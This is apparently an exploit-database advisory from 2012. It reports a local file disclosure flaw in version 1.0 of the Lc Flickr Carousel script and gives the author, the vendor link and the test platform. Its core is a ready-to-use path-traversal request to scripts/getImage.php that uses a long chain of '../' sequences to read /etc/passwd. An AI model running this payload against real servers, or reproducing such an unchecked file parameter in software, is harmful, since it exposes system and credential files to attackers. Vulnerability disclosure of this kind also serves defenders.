Lc Flickr Carousel version 1.0 suffers from a local file disclosure vulnerability.
dc7d17c6acb8edf73ecc37248cbc4108c8901dc3dbb59bf06deb7163d82d68e9
# Exploit Title: Lc Flickr Carousel V1.0 => Local File Disclosure Vulnerability
# Date: 11/07/2012
# Author: GoLd_M
# Vendor or Software Link: https://code.google.com/p/lcflickr/downloads/list
# Version: 1.0
# Category:: Local File Disclosure Vulnerability2
# Tested on: Xp SP 2
# Ex : [Lc Flickr Carousel V1.0]/scripts/getImage.php?file=../../../../../../../../../../../../../../etc/passwd
# See Test : https://upload.traidnt.net/upfiles/66w29123.jpg